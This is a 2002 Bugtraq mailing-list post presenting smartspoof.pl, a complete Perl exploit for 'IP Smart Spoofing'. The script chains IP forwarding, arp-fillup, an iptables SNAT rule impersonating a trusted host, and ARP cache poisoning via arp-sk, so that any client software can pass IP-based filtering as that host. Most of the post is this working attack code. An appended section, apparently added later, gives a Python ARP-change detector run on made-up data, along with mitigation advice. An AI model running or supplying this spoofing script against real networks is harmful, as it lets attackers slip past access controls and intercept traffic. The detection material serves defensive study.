Exploit code for IP Smart Spoofing
From: Laurent Licour (llicour@althes.fr) Date: 11/12/02
- Previous message: Aaron Howell: "[Fwd: Notice of serious vulnerabilities in ISC BIND 4 & 8]"
- Next in thread: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
- Reply: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
- Reply: Stephen Gill: "RE: Exploit code for IP Smart Spoofing"
From: Laurent Licour <llicour@althes.fr> To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com> Date: Tue, 12 Nov 2002 13:21:17 +0100
Hello

As we reported in our previous article, IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a
new method for IP spoofing, allowing a full connection from any client
software.

The exploit code smartspoof.pl is a proof of concept (for educational
purposes only) of the Smart Spoofing method.

The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz

These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools
Exploit code (Perl source):
#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# llicour@althes.fr
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

# Return the next hop for $ip0 from the kernel routing table ("route -n"),
# choosing the longest matching prefix; the outgoing interface is stored
# through the $int reference. A gateway of 0.0.0.0 means the address is
# directly reachable, so the next hop is the address itself.
sub get_ip_next_hop
{
    my ($ip0, $int) = @_;
    my $ip = new NetAddr::IP $ip0;
    open(ROUTE, "route -n |");
    <ROUTE>; <ROUTE>;    # skip the two header lines
    my $gateway = "";
    my $masklen;
    my @fields;
    my $line;
    my $entry;
    while ($line = <ROUTE>)
    {
        # Columns: Destination Gateway Genmask Flags Metric Ref Use Iface
        @fields = split / +/, $line;
        $entry = new NetAddr::IP($fields[0] . "/" . $fields[2]);
        if ($entry->contains($ip))
        {
            if (($gateway eq "") or ($masklen < $entry->masklen()))
            {
                $gateway = $fields[1];
                $masklen = $entry->masklen();
                $$int = $fields[7];
                chop $$int;    # drop the trailing newline
            }
        }
    }
    close(ROUTE);
    die "Error : No route for $ip \n" if ($gateway eq "");
    $gateway = $ip->addr() if ($gateway eq "0.0.0.0");
    return($gateway);
}

# Resolve the MAC address of $ip: ping it once so the kernel fills its ARP
# cache, then read the entry back from /proc/net/arp.
sub get_mac
{
    my $ip = shift;
    my $cmd = "ping -c 1 -w 1 $ip >/dev/null 2>&1";
    system($cmd);
    $cmd = "cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
    my $mac = `$cmd`;
    chop($mac);
    return($mac);
}

sub usage
{
    print "Start/Stop de smartspoofing\n\n";
    print "This is the proof of concept of the smartspoofing technique\n";
    print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
    print "\n";
    print "You only have to specify :\n";
    print " -D : address of the filtering equipement to connect to\n";
    print " -S : address of the trusted host to spoof\n";
    print "\n";
    print "Then, you only need to launch your favorite client software from this host\n";
    print "or any host behind this (because it is now a router)\n";
    print "\n";
    print "This script is provided as proof of concept for educational purpose only.\n";
    print "\n";
    exit 0;
}

my $syntax = "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@IP source> -start|-stop\n";
my $ver = "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface = "";
my ($version, $help);

Getopt::Long::GetOptions(
    "D=s"   => \$ipdst,
    "S=s"   => \$ipsrc,
    "i=s"   => \$interface,
    "v"     => \$version,
    "h"     => \$help,
    "start" => \$start,
    "stop"  => \$stop
) or die $syntax;

usage if $help;
die $ver if $version;
die $syntax unless @ARGV == 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;
my ($intsrc, $intdst);

# Next hops toward the spoofed source and the destination; the interface
# facing the destination is used unless -i overrides it.
my $ipsrc_next_hop = get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop = get_ip_next_hop($ipdst, \$intdst);
$interface = $intdst if ($interface eq "");

if ($start)
{
    print "Activate IP Forwarding\n";
    system("echo 1 > /proc/sys/net/ipv4/ip_forward");

    print "Activate Arp fillup on $ipsrc\n";
    system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

    print "Set NAT rule on iptables\n";
    $cmd = "iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT --to $ipsrc";
    system($cmd);

    print "Desactivate ICMP Redirect\n";
    system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP");

    print "Activate Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop on $interface\n";
    $cmd = "arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop -c 1 >/dev/null 2>&1";
    system($cmd);
    $cmd = "arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop >/dev/null 2>&1 &";
    system($cmd);
}
elsif ($stop)
{
    # Undo the start steps and restore the real MAC in the next hop's ARP cache.
    print "Suppress Arp fillup on $ipsrc\n";
    system("killall arp-fillup");

    print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop\n";
    system("killall arp-sk");
    my $mac = get_mac($ipsrc_next_hop);
    $cmd = "arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
    system($cmd);

    print "Clear iptables rules\n";
    system("service iptables stop");
    system("service iptables start");

    print "Desactivate ip forwarding\n";
    system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}
Regards
Laurent Licour
mailto:llicour@althes.fr
Althes
http://www.althes.fr
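The step the script labels "Arp cache poisoning" re-points the next hop's ARP entry for the trusted host with forged replies (arp-sk -r), and the stop branch repairs it with a reply carrying the real MAC; on a monitored segment that shows up as one IP address claiming two MACs in turn. As an added example (not from the original post or the Althes tools), the Python below applies the baseline-and-change check that arpwatch-style monitors use to constructed ARP reply records; every address and MAC in it is made up.

```python
from collections import defaultdict

# Constructed sample of ARP replies seen on the LAN: (ts, sender_ip, sender_mac).
# 10.0.0.1 plays the trusted host (the script's $ipsrc_next_hop); its real MAC
# is aa:bb:cc:00:00:01, while de:ad:be:ef:00:01 is a hypothetical forged one.
SAMPLE_ARP_REPLIES = [
    (100.0, "10.0.0.1", "aa:bb:cc:00:00:01"),
    (101.0, "10.0.0.2", "aa:bb:cc:00:00:02"),
    (160.0, "10.0.0.1", "de:ad:be:ef:00:01"),  # forged reply: binding changes
    (161.0, "10.0.0.1", "aa:bb:cc:00:00:01"),  # real host answers a request
    (162.0, "10.0.0.1", "de:ad:be:ef:00:01"),  # forged reply repeats
    (170.0, "10.0.0.2", "aa:bb:cc:00:00:02"),
]

def detect_arp_changes(replies, watched=None):
    """Return (ts, ip, old_mac, new_mac, kind) for every binding change.

    kind is "changed" the first time an IP claims a new MAC and "flip-flop"
    when it returns to a MAC it already used: two stations answering for the
    same address is the pattern a continuously re-sent forged reply produces.
    `watched` restricts alerts to critical addresses (gateways, trusted hosts).
    """
    current = {}             # ip -> MAC in the learned baseline
    seen = defaultdict(set)  # ip -> every MAC that has claimed it
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if watched is not None and ip not in watched:
            continue
        old = current.get(ip)
        if old is not None and old != mac:
            kind = "flip-flop" if mac in seen[ip] else "changed"
            alerts.append((ts, ip, old, mac, kind))
        current[ip] = mac
        seen[ip].add(mac)
    return alerts

def claimants(replies, ip):
    """All MACs that answered for `ip`; more than one means a conflict."""
    return sorted({mac.lower() for _, i, mac in replies if i == ip})

if __name__ == "__main__":
    for ts, ip, old, new, kind in detect_arp_changes(SAMPLE_ARP_REPLIES):
        print("t=%.0f %s: %s -> %s (%s)" % (ts, ip, old, new, kind))
    print("claimants for 10.0.0.1:", claimants(SAMPLE_ARP_REPLIES, "10.0.0.1"))
```

A static ARP entry for the gateway and trusted hosts on the filtering equipment, or dynamic ARP inspection on the switch, stops the binding from changing at all; the check above is the detective control for segments where that is not possible.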